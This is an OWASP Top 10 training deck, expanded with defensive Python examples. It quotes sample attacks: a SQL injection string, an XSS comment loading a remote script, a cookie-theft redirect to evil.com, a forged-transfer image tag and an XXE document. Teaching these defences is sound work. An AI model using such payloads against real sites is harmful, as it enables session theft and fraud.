2. Agenda
• What is web security and why?
• Introduction to OWASP
• OWASP top 10
• OWASP Security testing tools
• General Security testing tools
• Q & A
3. What is web security and why?
• Security of websites, web applications and web services.
• Emergence of Web 2.0
• Intruders exploit vulnerabilities
• Techniques: XSS, SQL injection, etc.
• Attacker profiles
• Catastrophic security hacks
• Sony Entertainment 2011 - 77 million accounts with credit card numbers
• JP Morgan Chase 2014 - 7.6 million account records
• MasterCard 2005 - 40 million accounts
• Business risk
• Trust issues
• Overhead costs
• Security checkpoints and techniques
• Early stages of development
4. OWASP (https://www.owasp.org)
• The Open Web Application Security Project (OWASP)
• Non-profit organization, open community
• Vulnerabilities, threats, attacks and countermeasures
• Development guide
• https://www.owasp.org/index.php/Projects/OWASP_Development_Guide
• Testing guide
• https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
• Code review guide
• https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
• WebGoat sample web application
• https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
• Mailing lists
• https://lists.owasp.org/mailman/listinfo
• Newsletter
• https://www.owasp.org/index.php/Category:OWASP_Newsletter
• Many more…
5. OWASP top 10 (2017)
• Injection
• Broken Authentication and Session Management
• Cross Site Scripting (XSS)
• Broken Access Control
• Security Misconfiguration
• Sensitive Data Exposure
• Insufficient Attack Protection
• Cross Site Request Forgery (CSRF)
• Using Components with Known Vulnerabilities
• Underprotected APIs
6. (#1)-Injection
• Sends untrusted data into the system
• Text-based attacks
• External and internal parties
• SQL, LDAP, JPQL, XPath, NoSQL
• String query = "SELECT * FROM user_data WHERE lastName='" + request.getParameter("lastName") + "'";
• Query HQLQuery = session.createQuery("FROM user_data WHERE lastName ='" + request.getParameter("lastName") + "'");
• http://example.com/app/userView?lastName=' or '1'='1
8. Preventing Injection
• Avoid dynamic queries
• Parameterized queries
• PreparedStatement, SQLCommand, PDO
• Stored procedures
• Input validation
• Carefully escape special characters if no API is available
• OWASP Enterprise Security API
• ESAPI.encoder().encodeForSQL( new OracleCodec(), queryparam );
• Use code analysis tools
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
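The two fixes the slide puts first, avoiding dynamic queries and binding parameters, side by side with the string-built query from slide 6. This is an added example, not code from the deck; it uses an in-memory SQLite table as a stand-in for the user_data table and an assumed allow-list pattern for last names.

```python
"""Vulnerable string-built query beside its parameterized form.

Added example (not from the slides): an in-memory SQLite table stands in
for the user_data table that the slides query from Java.
"""
import re
import sqlite3

PAYLOAD = "' or '1'='1"  # the injection string quoted on slide 6


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three users, one of them named Smith."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (userid INTEGER, lastName TEXT)")
    conn.executemany(
        "INSERT INTO user_data VALUES (?, ?)",
        [(101, "Smith"), (102, "Jones"), (103, "Plane")],
    )
    return conn


def lookup_dynamic(conn, last_name: str) -> list:
    """Mirror of the slide's Java: the parameter is concatenated into the SQL.
    Deliberately vulnerable; kept only for comparison."""
    query = "SELECT * FROM user_data WHERE lastName='" + last_name + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, last_name: str) -> list:
    """Parameterized query: the driver binds the value, so quote characters
    inside last_name are data and never become SQL syntax."""
    query = "SELECT * FROM user_data WHERE lastName=?"
    return conn.execute(query, (last_name,)).fetchall()


# Assumed allow-list for a last name: a letter followed by letters, apostrophes,
# hyphens or spaces. Validation is a second layer, not a replacement for binding.
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z' -]{0,63}$")


def validate_last_name(value: str) -> bool:
    return bool(NAME_RE.fullmatch(value))


if __name__ == "__main__":
    db = make_db()
    print("dynamic:", lookup_dynamic(db, PAYLOAD))          # every row leaks
    print("parameterized:", lookup_parameterized(db, PAYLOAD))  # no rows
    print("valid input?", validate_last_name(PAYLOAD))
```

Run as a script, the dynamic lookup returns all three rows for the payload while the parameterized one returns none; the allow-list rejects the payload outright (its first character is a quote) but still accepts names such as O'Brien.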
9. (#2)-Broken Authentication and Session Management
• Custom authentication and session management with flaws
• Credentials not protected with hashing
• Insider attacks
• Credentials can be guessed
• Session ID exposed in the URL -> session fixation
• Session ID does not time out
• Session IDs are not rotated on successful login
• http://website.com/login.php?;jsessionid=2P0OC2JSNDLPSKHCJUN2JV&d
11. Crack Password Hash
• Dictionary attack
• File containing words, phrases, common passwords
• Brute-force attack
• Tries every possible combination of characters up to a given length.
• Lookup table
• Dictionary in a lookup table data structure
• Rainbow table
• High performance lookup
12. User Registration with Salt
• App posts the username foo@example.com with password pass
• Server generates a random salt r
• Server computes h = H(r|pass)
• Server stores (foo@example.com, h, r) in the DB
13. Simplified login flow
• App posts username foo@example.com and password pass
• Server looks up the salt r using the user id
• Server computes the hash h' = H(r|pass)
• If (foo@example.com, h') exists in the DB, allow login
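The registration and login flows of slides 12 and 13 as running code, with the generic failure message slide 21 recommends. This is an added example, not the deck's own code. H is realised as PBKDF2-HMAC-SHA256 (salted and deliberately slow, which is what defeats the lookup and rainbow tables of slide 11); the iteration count and the in-memory dictionary standing in for the DB are assumptions.

```python
"""Salted password storage and verification (added example, not from the slides).

H(r|pass) from slide 12 is implemented as PBKDF2-HMAC-SHA256: the salt r
makes precomputed lookup/rainbow tables useless, and the iteration count makes
each guess expensive. A plain SHA-256 would be salted but fast to brute-force.
"""
import hashlib
import hmac
import os

ITERATIONS = 100_000            # assumed work factor
GENERIC_FAILURE = "Login failed; Invalid userID or password"

# Constructed in-memory stand-in for the DB: username -> (h, r)
USER_DB = {}


def H(salt: bytes, password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def register(username: str, password: str) -> None:
    r = os.urandom(16)          # server generates a random salt r
    h = H(r, password)          # server computes h = H(r|pass)
    USER_DB[username] = (h, r)  # server stores (username, h, r)


def login(username: str, password: str) -> tuple:
    """Slide 13: look up r by user id, recompute h', compare.

    Unknown user and wrong password return the same message, and the unknown
    user path still performs one hash so response time does not reveal which
    usernames exist.
    """
    record = USER_DB.get(username)
    if record is None:
        H(b"\x00" * 16, password)       # equalise work for unknown users
        return False, GENERIC_FAILURE
    h, r = record
    h_prime = H(r, password)
    if hmac.compare_digest(h, h_prime):   # constant-time comparison
        return True, "ok"
    return False, GENERIC_FAILURE


if __name__ == "__main__":
    register("foo@example.com", "pass")
    print(login("foo@example.com", "pass"))
    print(login("foo@example.com", "wrong"))
    print(login("nobody@example.com", "pass"))
```

Because r is fresh per user, two accounts with the same password store different hashes, so a table built for one stored hash says nothing about another.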
20. Preventing broken authentication contd...
• Implement proper password strength controls
• Password length > 10 and < 128
• Password complexity
• at least 1 uppercase character (A-Z)
• at least 1 lowercase character (a-z)
• at least 1 digit (0-9)
• at least 1 special character (punctuation); do not forget to treat space as a special character too
• Not more than 2 identical characters in a row (e.g., 111 not allowed)
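The rules on slide 20 as a checker that reports every rule a candidate password violates, so the user sees all problems at once rather than one per attempt. Added example, not code from the deck; the wording of the messages is assumed.

```python
"""Password strength controls from slide 20 (added example, not from the deck)."""
import re
import string


def password_problems(pw: str) -> list:
    """Return the list of rules the password violates; empty means accepted."""
    problems = []
    if not (10 < len(pw) < 128):
        problems.append("length must be greater than 10 and less than 128")
    if not re.search(r"[A-Z]", pw):
        problems.append("needs at least 1 uppercase character (A-Z)")
    if not re.search(r"[a-z]", pw):
        problems.append("needs at least 1 lowercase character (a-z)")
    if not re.search(r"[0-9]", pw):
        problems.append("needs at least 1 digit (0-9)")
    # Space counts as a special character, exactly as the slide insists.
    if not any(c in string.punctuation or c == " " for c in pw):
        problems.append("needs at least 1 special character (punctuation or space)")
    # A backreference catches any character repeated three times in a row.
    if re.search(r"(.)\1\1", pw):
        problems.append("no more than 2 identical characters in a row")
    return problems


def is_acceptable(pw: str) -> bool:
    return not password_problems(pw)


if __name__ == "__main__":
    for candidate in ["Correct Horse 9!", "Passw0rd111!", "short1A!"]:
        print(repr(candidate), password_problems(candidate) or "accepted")
```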
21. Preventing broken authentication contd..
• Authentication and Error Messages
• respond with a generic error message
• Incorrect Response Examples
• "Login for User foo: invalid password"
• "Login failed, invalid user ID"
• "Login failed; account disabled"
• "Login failed; this user is not active"
• Correct Response example
• "Login failed; Invalid userID or password"
22. Preventing broken authentication contd..
• Prevent brute force attacks
• Account lock out
• Multifactor authentication
• Logging and Monitoring
• Use of authentication protocols that require no password
• OAuth
• OpenID
• SAML
• Leverage available frameworks and tools
• Apache Shiro
• Spring Security
• OWASP ESAPI
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet
23. Preventing Session Management issues
• Secure login over HTTPS
• Password submitted encrypted
• Immediate redirect to HTTP
• Session ID sent in clear text <- vulnerability
24. Preventing Session Management issues contd..
• User requests an HTTP page; the response redirects to HTTPS
• The 302 response travels over HTTP: vulnerability point
25. Preventing Session Management issues contd..
• HSTS - HTTP Strict Transport Security
• Opt-in security control
• Instructs the browser to upgrade to HTTPS (STS)
• HSTS forces
• All communications over HTTPS
• No insecure HTTP requests sent from the browser
• No option for the user to override untrusted certificates
26. Enabling HSTS
• In Apache add the below to .htaccess
• # Use HTTP Strict Transport Security to force client to use secure connections only
Header always set Strict-Transport-Security "max-age=300; includeSubDomains"
max-age => The time, in seconds, that the browser should remember that this site is only to be accessed using HTTPS.
includeSubDomains => If this optional parameter is specified, this rule applies to all of the site's subdomains as well.
• Can be done in Nginx, IIS, etc.
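What the browser does with the header from slide 26: it parses the directives, remembers the host for max-age seconds, and rewrites later http:// requests to https:// before they leave the machine, which is what closes the 302 window on slide 24. This is an added model of the browser side, not code from the deck or from any browser; the clock injection and the two-state cache are assumptions for the sake of a runnable demonstration.

```python
"""Model of the browser's HSTS behaviour (added example, not from the slides)."""
import time
from urllib.parse import urlsplit, urlunsplit


def parse_hsts(header: str) -> dict:
    """Parse a Strict-Transport-Security value into its directives.
    Returns {} when max-age is missing or malformed, since browsers ignore such headers."""
    policy = {"include_subdomains": False, "preload": False}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            value = value.strip().strip('"')
            if not value.isdigit():
                return {}
            policy["max_age"] = int(value)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy if "max_age" in policy else {}


class StsCache:
    """Minimal model of the browser's STS store: host -> (expiry, includeSubDomains)."""

    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be demonstrated
        self._hosts = {}

    def learn(self, host: str, header: str) -> None:
        """Record the policy a host sent (only over HTTPS in a real browser)."""
        policy = parse_hsts(header)
        if not policy:
            return
        if policy["max_age"] == 0:           # max-age=0 tells the browser to forget the host
            self._hosts.pop(host, None)
            return
        self._hosts[host] = (self._now() + policy["max_age"], policy["include_subdomains"])

    def is_known(self, host: str) -> bool:
        """Exact match always counts; a parent domain counts only with includeSubDomains."""
        now = self._now()
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self._hosts.get(".".join(labels[i:]))
            if entry is None:
                continue
            expiry, include_sub = entry
            if now < expiry and (i == 0 or include_sub):
                return True
        return False

    def rewrite(self, url: str) -> str:
        """Upgrade http:// to https:// for known hosts; the insecure request is never sent."""
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname and self.is_known(parts.hostname):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url


if __name__ == "__main__":
    cache = StsCache()
    cache.learn("example.com", "max-age=300; includeSubDomains")
    print(cache.rewrite("http://example.com/login.php"))
    print(cache.rewrite("http://www.example.com/"))
```

The slide's max-age of 300 seconds is suitable for a first rollout; once the site is confirmed to work over HTTPS everywhere, the value is normally raised to a year or more (the browser preload list requires at least one year), otherwise a user who stays away for more than five minutes is back to the unprotected first request.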
27. Preventing Session Management issues contd..
• HTTP Strict Transport Security (HSTS)
• Cookies
• Secure
• <secure>true</secure>
• HttpOnly
• <http-only>true</http-only>
• Cache-Control: no-cache, no-store
• Pragma: no-cache
• New session ids on consecutive logins
29. (#3)-Cross Site Scripting (XSS)
• Text-based attack scripts that exploit the interpreter in the browser.
• The attacker adds the following comment:
• Great price for a great item! Read my review here <script src="http://hackersite.com/authstealer.js"> </script>.
• document.location=http://evil.com?id=document.cookie
31. Preventing XSS
• HTML escape before inserting untrusted data
• String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );
• & --> &amp;
• < --> &lt;
• > --> &gt;
• JavaScript escape before inserting untrusted data
• <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
• String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );
• CSS escape before inserting untrusted data
• <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>
• String safe = ESAPI.encoder().encodeForCSS( request.getParameter( "input" ) );
32. Preventing XSS contd…
• URL escape before inserting untrusted data
• <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a>
• String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) );
• XSS filters: block requests with dangerous tags and scripts
• OWASP AntiSamy project
• HTML and CSS encoding.
• https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project
• HTML sanitizer project
• https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
• https://github.com/mganss/HtmlSanitizer
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
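The four context-specific encoders that slides 31 and 32 call through ESAPI, written out so the per-context rules are visible, and applied to the comment from slide 29. This is an added example, not ESAPI and not code from the deck; the encoding rules follow the same principle ESAPI uses (leave alphanumerics alone, encode everything else for the target context) but are a compact reimplementation, not ESAPI's.

```python
"""Context-sensitive output encoding (added example; not ESAPI, not from the slides).

The point of four encoders is that the browser has four interpreters: what is
harmless in an HTML text node can still break out of a JavaScript string, a CSS
value, or a URL parameter.
"""
import html
import re
from urllib.parse import quote

# The comment the attacker posts on slide 29.
PAYLOAD = ('Great price for a great item! Read my review here '
           '<script src="http://hackersite.com/authstealer.js"> </script>.')

_ALNUM = re.compile(r"[A-Za-z0-9]")


def encode_for_html(s: str) -> str:
    """HTML body / attribute context: & < > " ' become entities."""
    return html.escape(s, quote=True)


def encode_for_javascript(s: str) -> str:
    """JavaScript string context: every non-alphanumeric becomes \\xHH or \\uHHHH,
    so no quote, angle bracket or backslash in the data can end the string."""
    out = []
    for ch in s:
        if _ALNUM.fullmatch(ch):
            out.append(ch)
        elif ord(ch) < 256:
            out.append("\\x%02X" % ord(ch))
        else:
            out.append("\\u%04X" % ord(ch))
    return "".join(out)


def encode_for_css(s: str) -> str:
    """CSS value context: backslash, hex code point, space terminator."""
    return "".join(ch if _ALNUM.fullmatch(ch) else "\\%X " % ord(ch) for ch in s)


def encode_for_url(s: str) -> str:
    """URL parameter context: percent-encode everything outside the unreserved set."""
    return quote(s, safe="")


def render_comment(comment: str) -> str:
    """Template fragment for a product review; the data is encoded for the
    HTML context it lands in, so the script tag is displayed, not executed."""
    return "<p class=\"review\">" + encode_for_html(comment) + "</p>"


if __name__ == "__main__":
    print(render_comment(PAYLOAD))
    print(encode_for_javascript("</script>"))
    print(encode_for_css("</style>"))
    print(encode_for_url("' or '1'='1"))
```

Encoding is chosen by where the data is written, not by where it came from: the same review text needs encode_for_javascript if a script embeds it in a string literal, and encode_for_url if it is appended to a link.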
33. (#4)-Broken Access Control
• Unprivileged function access
• http://example.com/app/getappInfo
• http://example.com/app/admin_getappInfo
• Unauthorized data access
• http://soomebank.com/showacct?id=101
• http://soomebank.com/showacct?id=102
• Prevention
• Access control matrix
• Check access
• Do not assume that users will be unaware of special or hidden URLs or APIs.
• Penetration tests
• Regular audits, code reviews, Automated verification
• Principle of least privilege
• Principle of defense in depth
• https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference
• https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
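Both failure modes on slide 33 need a different check: the admin_getappInfo URL is a function-level decision (is this role allowed to call this function?), while showacct?id=102 is an object-level decision (does this account belong to the caller?). The dispatcher below applies both on every request, hidden URL or not. Added example, not code from the deck; the roles, the access control matrix and the account owners are constructed.

```python
"""Function-level and object-level access checks (added example, not from the slides)."""

# The access control matrix: which functions each role may call.
MATRIX = {
    "user":  {"getappInfo", "showacct"},
    "admin": {"getappInfo", "admin_getappInfo", "showacct"},
}

# Constructed account table for the showacct example: account id -> owner.
ACCOUNTS = {101: "alice", 102: "bob"}


class Forbidden(Exception):
    """Raised for any request that fails either check; the caller maps it to 403."""


def check_function_access(role: str, function: str) -> None:
    """Function-level check: guessing admin_getappInfo does not help a plain user."""
    if function not in MATRIX.get(role, set()):
        raise Forbidden(f"role {role!r} may not call {function!r}")


def check_object_access(user: str, role: str, account_id: int) -> None:
    """Object-level check: id=102 is rejected unless the caller owns account 102
    (or is an admin). Without this, a valid user can walk every account number."""
    owner = ACCOUNTS.get(account_id)
    if owner is None:
        raise Forbidden("no such account")   # same answer as 'not yours' to avoid enumeration
    if role != "admin" and owner != user:
        raise Forbidden(f"{user!r} does not own account {account_id}")


def handle(user: str, role: str, path: str, query: dict) -> str:
    """Every request goes through both checks before any data is touched."""
    function = path.rsplit("/", 1)[-1]
    check_function_access(role, function)
    if function == "showacct":
        account_id = int(query.get("id", "0"))
        check_object_access(user, role, account_id)
        return f"account {account_id} owned by {ACCOUNTS[account_id]}"
    return f"{function} ok for {role}"


def is_allowed(user: str, role: str, path: str, query: dict) -> bool:
    try:
        handle(user, role, path, query)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    print(handle("alice", "user", "/app/showacct", {"id": "101"}))
    print(is_allowed("alice", "user", "/app/showacct", {"id": "102"}))
    print(is_allowed("alice", "user", "/app/admin_getappInfo", {}))
```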
34. (#5)-Security misconfiguration
• Can happen at any level
• Web server
• App server
• Database
• Custom code
• Out of date software
• Unnecessary ports, services
• Error message throws a stack trace?
• Framework settings set to a secure value? (Struts, Spring, .NET, etc.)
• Prevention
• Frequent audits
• Deployment process
• Automate configuration validity
• https://www.owasp.org/index.php/Configuration
• https://www.owasp.org/index.php/Error_Handling
• https://www.owasp.org/index.php/Testing_for_configuration_management
• https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)
• https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management
35. (#6)-Sensitive data exposure
• Passwords, credit card numbers, etc. (in transit or at rest)
• Not encrypting sensitive data
• Use of weak keys and algorithms to encrypt
• SSL not enabled along the entire path
• Prevention measures
• Encrypt sensitive data correctly
• AES-256
• Key encrypting key
• Hardware security modules
• RSA 2048
• Don’t store sensitive data unnecessarily
• Disable caching and auto completion
• https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_SSL-TLS
36. (#7) -Insufficient Attack Protection
• Inability to detect, prevent, and respond to both manual and automated attacks
• Attack with OWASP ZAP, SQLMap tools (http://sqlmap.org/)
• Manual human attack
• Detect attacks -> OWASP AppSensor
• An input a legitimate client can't generate?
• Unusual usage patterns, repeated requests, spikes?
• Respond to attacks -> OWASP AppSensor
• Decide whether to automatically block requests, IP addresses, or IP ranges.
• Consider disabling or monitoring misbehaving user accounts.
• Patch quickly
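The two detection questions on slide 36 run over a handful of access-log lines: one address repeats failed logins, another sends an account id the real client form could never produce. Added example in the spirit of AppSensor's detection points, not AppSensor itself and not code from the deck; the log format, thresholds and addresses are constructed.

```python
"""Detection logic over constructed access-log lines (added example, not from
the slides): two AppSensor-style detection points and the response decision
they feed. Log format, thresholds and addresses are assumed."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs

# Constructed sample log: one address hammering /login, one sending an account
# id the client form cannot generate, one normal user.
LOG_LINES = """\
2017-06-01T10:00:01Z 203.0.113.7 POST /login status=401
2017-06-01T10:00:03Z 203.0.113.7 POST /login status=401
2017-06-01T10:00:05Z 203.0.113.7 POST /login status=401
2017-06-01T10:00:08Z 203.0.113.7 POST /login status=401
2017-06-01T10:00:10Z 203.0.113.7 POST /login status=401
2017-06-01T10:00:12Z 198.51.100.9 POST /login status=401
2017-06-01T10:00:20Z 198.51.100.9 POST /login status=200
2017-06-01T10:00:31Z 198.51.100.9 GET /app/showacct?id=101' status=200
2017-06-01T10:01:02Z 192.0.2.44 GET /app/showacct?id=102 status=200
""".splitlines()

LINE_RE = re.compile(r"^(\S+)Z (\S+) (GET|POST) (\S+) status=(\d+)$")
FAILED_LOGIN_THRESHOLD = 5   # assumed policy: 5 failures ...
WINDOW_SECONDS = 60          # ... within one minute from one address


def parse(line: str):
    """Split one log line into a dict; None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, method, target, status = m.groups()
    path, _, query = target.partition("?")
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), "ip": ip,
            "method": method, "path": path, "query": query, "status": int(status)}


def detect(lines) -> list:
    """Return (ip, kind, detail) alerts for the two detection points."""
    alerts = []
    failures = defaultdict(list)
    for ev in filter(None, map(parse, lines)):
        # Detection point 1: an input a legitimate client can't generate.
        # The account page only ever submits id=<digits>; anything else was
        # produced by a tool or a hand-edited URL.
        if ev["path"] == "/app/showacct":
            for value in parse_qs(ev["query"]).get("id", []):
                if not value.isdigit():
                    alerts.append((ev["ip"], "unexpected_input", f"id={value!r}"))
        # Detection point 2: repeated failed logins from one address in a window.
        if ev["path"] == "/login" and ev["status"] == 401:
            recent = failures[ev["ip"]]
            recent.append(ev["ts"])
            recent[:] = [t for t in recent
                         if (ev["ts"] - t).total_seconds() <= WINDOW_SECONDS]
            if len(recent) == FAILED_LOGIN_THRESHOLD:
                alerts.append((ev["ip"], "brute_force",
                               f"{len(recent)} failed logins within {WINDOW_SECONDS}s"))
    return alerts


def respond(alerts) -> tuple:
    """Response decision from the slide: block addresses that hit the brute-force
    threshold, put addresses that merely sent malformed input on a watch list."""
    block, watch = set(), set()
    for ip, kind, _ in alerts:
        (block if kind == "brute_force" else watch).add(ip)
    return block, watch - block


if __name__ == "__main__":
    found = detect(LOG_LINES)
    for alert in found:
        print(alert)
    print("block:", *respond(found))
```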
40. (#8)-Cross Site Request Forgery
• Attacker tricks the victim with URLs
• Execute unwanted actions
• Compromise the entire application
• http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
• Attacker emails the below URL to the victim
• <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
41. Preventing CSRF
• Include a unique token in a hidden field
• Verify the token on each request
• CSRFGuard
• Re-authenticate
• https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
• http://lists.owasp.org/pipermail/owasp-csrfguard
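The first two bullets of slide 41 applied to the transferFunds handler from slide 40: a token derived from a per-session secret is placed in the form's hidden field, and the handler rejects any request that does not carry a matching token. The forged img request carries the victim's session cookie but cannot carry the token, so it fails. Added example, not CSRFGuard and not code from the deck; the session store and the HMAC-over-action construction are assumptions.

```python
"""Synchronizer-style CSRF token, HMAC variant (added example, not from the slides)."""
import hashlib
import hmac
import secrets

# Constructed in-memory session store: session id -> per-session CSRF secret.
SESSIONS = {}


def new_session() -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = secrets.token_bytes(32)
    return sid


def csrf_token(sid: str, form_action: str) -> str:
    """Token for the hidden field: bound to the session secret and to the action
    the form submits to, so a token lifted from one form cannot drive another."""
    return hmac.new(SESSIONS[sid], form_action.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_csrf(sid: str, form_action: str, token: str) -> bool:
    """Recompute and compare in constant time; absent session or token fails."""
    if sid not in SESSIONS or not token:
        return False
    return hmac.compare_digest(csrf_token(sid, form_action), token)


def transfer_funds(sid: str, params: dict) -> tuple:
    """The slide's /app/transferFunds with the check applied. Only the browser
    that rendered the real form holds the token; a forged <img> request from
    another site sends the cookie (sid) but no token."""
    if not verify_csrf(sid, "/app/transferFunds", params.get("csrf_token", "")):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {params['amount']} to {params['destinationAccount']}"


if __name__ == "__main__":
    sid = new_session()
    forged = {"amount": "1500", "destinationAccount": "attackersAcct"}
    print(transfer_funds(sid, forged))
    legit = dict(amount="1500", destinationAccount="4673243243",
                 csrf_token=csrf_token(sid, "/app/transferFunds"))
    print(transfer_funds(sid, legit))
```

Re-authentication for high-value actions, the slide's last bullet, is an additional step on top of this check, not a substitute for it.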
42. (#9)-Using components with known vulnerabilities
• Outdated libraries
• Apache CXF Authentication Bypass (2012)
• Call with no identity token => invoke any web service with full permission
• Spring Remote Code Execution (2011/2012)
• Expression Language flaw => execute arbitrary code on the server
• Struts2 Remote Code Execution (2017)
• Mishandles file upload
• Content-Type header flaw => execution of arbitrary code on the server
43. Preventing using components with known vulnerabilities
• Identify all components and dependent libraries
• OWASP_Dependency_Check
• https://www.owasp.org/index.php/OWASP_Dependency_Check
• Retire.js
• https://github.com/retirejs/retire.js/
• Monitor security of these components
• Mailing lists
• Official sites
• Security policy on 3rd party libraries
• Software development practices to use
• Passing security tests
• Acceptable licenses
• Wrappers to expose only the required functions of an API
• https://cve.mitre.org/about/
• https://www.owasp.org/index.php/Virtual_Patching_Best_Practices
44. (#10)- Underprotected APIs
• REST, JSON, and XML APIs
• Mobile app connecting to a remote API (username, password and account number)
• Public SMS JSON API -> SQL injection
• XML XXE (XML External Entity)
• External entity is processed by the XML parser
• Prevention
• Secure communications between the client and your APIs.
• Strong authentication scheme for your APIs.
• Parser configuration hardened against attack.
• Protect against injection of all forms
• https://www.owasp.org/index.php/REST_Security_Cheat_Sheet
• https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet
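The "parser configuration hardened against attack" bullet of slide 44, for the XXE case the slide names: the parser refuses any document that carries a DOCTYPE, so no entity declaration, internal or external, is ever processed. Added example using Python's expat binding, not code from the deck; the sample documents are constructed and the external entity's file path is a placeholder.

```python
"""XML parsing hardened against XXE (added example, not from the slides).

Rejecting the DOCTYPE outright is the simplest safe configuration: external
entities can only be declared inside a DTD, so a document without one cannot
ask the parser to read files or URLs on the server.
"""
import xml.parsers.expat

# Constructed test document: the classic XXE shape, with a placeholder path.
XXE_DOC = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE account [<!ENTITY xxe SYSTEM "file:///placeholder/path/on/server">]>'
    "<account><id>&xxe;</id></account>"
)
PLAIN_DOC = "<account><id>101</id></account>"


class UnsafeXML(ValueError):
    """Raised when a document uses a feature the API has no business accepting."""


def parse_hardened(data: str) -> dict:
    """Parse with expat, refusing any DOCTYPE, and return {element: text}."""
    parser = xml.parsers.expat.ParserCreate()
    parser.buffer_text = True
    result, stack = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before any entity declaration is read; raising here aborts the parse.
        raise UnsafeXML("DOCTYPE declarations are not accepted by this API")

    def start_element(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def end_element(name):
        stack.pop()

    def char_data(text):
        if stack:
            result[stack[-1]] += text

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(data, True)
    return result


def is_safe_xml(data: str) -> bool:
    """True when the document parses under the hardened configuration."""
    try:
        parse_hardened(data)
        return True
    except (UnsafeXML, xml.parsers.expat.ExpatError):
        return False


if __name__ == "__main__":
    print(parse_hardened(PLAIN_DOC))
    print("XXE document accepted?", is_safe_xml(XXE_DOC))
```

The same policy goes by other names in other stacks (disallow-doctype-decl in Java's XML parsers, for instance); whatever the parser, the check is that a document with a DTD is refused before any entity is resolved.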
46. OWASP Testing tools
• The OWASP Application Security Verification Standard (ASVS) Project
• Tests web application technical security controls
• Requirements for secure development.
• Procurement
• https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project
• OWASP live CD project
• Best open source security tools in a single bootable environment
• Boot from this Live CD or run it as a VM
• Access to a full security testing suite
• No configuration required
• OWASP ZAP
• https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
47. General Security Testing tools
• IronWASP (https://ironwasp.org/)
• Over 25 kinds of web vulnerabilities
• Wireshark (https://www.wireshark.org/)
• Network packet analyzer.
• Google nogotofail (https://github.com/google/nogotofail)
• Known TLS/SSL vulnerabilities and misconfigurations.
• SQLMap (http://sqlmap.org/)
• SQL injection
• Qualys (https://www.qualys.com)